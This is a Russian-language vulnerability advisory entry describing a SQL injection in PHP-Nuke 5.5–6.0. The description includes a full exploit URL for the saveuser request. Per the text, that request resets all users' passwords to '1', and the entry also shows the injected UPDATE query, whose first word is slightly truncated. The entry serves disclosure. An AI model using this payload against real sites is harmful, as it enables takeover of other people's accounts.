Дата публикации: | 04.11.2002 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1900 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | PHP-Nuke – система управления контентом, написанная на PHP.
PHP-Nuke уязвим к нападению SQL injection, которая позволяет атакующему изменять существующий SQL запрос и модифицировать информацию в базе данных. Следующий пример изменит все пароли пользователей PHP-Nuke на ‘1’. Эксплуатация требует, чтобы атакующий вошел в систему и определил свой UID, просматривая код страницы. Если UID атакующего равен 2, то он может начать нападение, запрашивая следующий URL: modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage= no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/* Введенный запрос построен следующим образом: PDATE nuke_users SET name = '', email = '', femail = '', url = 'http://', pass = 'xxxxx', +--[ bio = '\', | user_avatar = '', | user_icq = '', | user_occ = '', | user_from = '', | user_intrest = '', | user_sig = '', | user_aim = '', | user_yim = '', | user_msnm = '', +--[ newsletter = ', bio=0,pass=md5(1)/*' WHERE uid='2'уязвимость обнаружена в PHP-Nuke 5.5-6.0 |
Ссылки: | iDEFENSE Security Advisory 10.31.02c: PHP-Nuke SQL Injection Vulnerability |